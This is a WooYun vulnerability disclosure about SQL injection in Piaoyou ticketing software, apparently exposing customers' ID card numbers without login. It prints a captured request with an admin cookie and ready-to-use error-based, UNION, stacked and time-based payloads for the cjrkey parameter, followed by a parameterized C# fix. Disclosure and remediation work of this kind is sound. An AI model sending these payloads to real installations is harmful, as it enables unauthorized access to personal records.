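Vulnerability summary

Bug ID: wooyun-2015-0120643

Title: Generic SQL injection in a third-party ticketing system + unauthorized viewing of ID card numbers and other information #2 (no login required)

Vendor: 票友软件 (Piaoyou Software)

Author: 路人甲

Submitted: 2015-06-17 10:15

Fixed: 2015-09-20 09:22

Publicly disclosed: 2015-09-20 09:22

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]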

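Vulnerability details

Disclosure status:

2015-06-17: Details sent to the vendor; waiting for the vendor to respond
2015-06-22: Vendor confirmed; details visible to the vendor only
2015-06-25: Details opened to third-party security partners
2015-08-16: Details opened to core white hats and domain experts
2015-08-26: Details opened to regular white hats
2015-09-05: Details opened to trainee white hats
2015-09-20: Details opened to the public

Brief description:

rt

Detailed description: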

Taking the vendor's official demo as an example:
Disable JS in Firefox:


Proof of vulnerability:

Captured request:
POST http://demo.piaoyou.org/Welcome.aspx HTTP/1.1
Host: demo.piaoyou.org
Connection: keep-alive
Content-Length: 6721
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://demo.piaoyou.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.piaoyou.org/Welcome.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=fkry0rvyd1ghhruvex4aoxaf; pycookie=loginname=admin&truename=%e7%b3%bb%e7%bb%9f%e7%ae%a1%e7%90%86%e5%91%98&flag=1&datagroup=admin%7cWeb%7cxiaofeng%7ctest%7cfengxiao%7cwangxiaoming%7cqq%7c%e4%b8%8a%e6%b5%b7%e5%b0%8f%e5%b0%81%7c&kefugroup=%e7%bd%91%e7%bb%9c%e9%83%a8&kpgroup=0&kpdian=
__VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&ckfs_sel=0&cjrkey=aaa&company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
Injection exists in multiple parameters, including lx_key and cjrkey
Parameter: cjrkey (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&ckfs_sel=0&cjrkey=aaa%' AND 8229=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8229=8229) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(107)+CHAR(113))) AND '%'='&company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&ckfs_sel=0&cjrkey=aaa%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(79)+CHAR(113)+CHAR(106)+CHAR(103)+CHAR(72)+CHAR(81)+CHAR(116)+CHAR(108)+CHAR(80)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&ckfs_sel=0&cjrkey=aaa%'; WAITFOR DELAY '0:0:5'--&company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=[omitted]&ckfs_sel=0&cjrkey=aaa%' WAITFOR DELAY '0:0:5'--&company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [49]:

Remediation:

Filter the input
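
The payloads above all work by closing a `LIKE '%...%'` string literal in the `cjrkey` search, so the durable fix is to keep the value out of the SQL text entirely. The following is an added example, not the vendor's code: it shows the concatenated query beside a parameterized form for ASP.NET and SQL Server, and the table, column and method names are hypothetical because the page does not show the server-side source.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example: Passengers, Name, CardNo and the method names are
// hypothetical; the page does not show the server-side code.
public static class PassengerSearch
{
    // Vulnerable pattern implied by the report: cjrkey is concatenated into a
    // LIKE clause, so a quote in the value ends the string literal and the
    // rest of the value is parsed as T-SQL.
    public static SqlCommand BuildUnsafe(SqlConnection conn, string cjrkey)
    {
        string sql = "SELECT Name, CardNo FROM Passengers " +
                     "WHERE Name LIKE '%" + cjrkey + "%'";
        return new SqlCommand(sql, conn);
    }

    // Escape LIKE metacharacters so the keyword only matches literally and a
    // bare "%" cannot turn the search into "return every row".
    public static string EscapeLike(string s)
    {
        return s.Replace(@"\", @"\\").Replace("%", @"\%")
                .Replace("_", @"\_").Replace("[", @"\[");
    }

    // Hardened form: the SQL text is constant and the keyword travels as a
    // typed parameter, so it is never parsed as SQL.
    public static SqlCommand BuildSafe(SqlConnection conn, string cjrkey)
    {
        const string sql = "SELECT Name, CardNo FROM Passengers " +
                           @"WHERE Name LIKE @kw ESCAPE '\'";
        var cmd = new SqlCommand(sql, conn);
        cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 64).Value =
            "%" + EscapeLike(cjrkey) + "%";
        return cmd;
    }

    public static void Main()
    {
        // Constructed input with the same shape as the payloads on this page.
        string input = "aaa%' AND 1=1 AND '%'='";
        // No connection is opened; only the command text is inspected.
        Console.WriteLine(BuildUnsafe(null, input).CommandText);
        SqlCommand safe = BuildSafe(null, input);
        Console.WriteLine(safe.CommandText);
        Console.WriteLine(safe.Parameters["@kw"].Value);
    }
}
```

The first line printed shows the input rewriting the `WHERE` clause; in the second and third, the statement text is unchanged and the input appears only as the value of `@kw`.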

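Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2015-06-22 09:21

Vendor reply:

cnvd confirmed and reproduced the reported issue, and has notified the software vendor through previously known public contact channels. For the affected cases, no contact channel has been established yet; the software vendor will contact them and handle remediation.

Latest status:

None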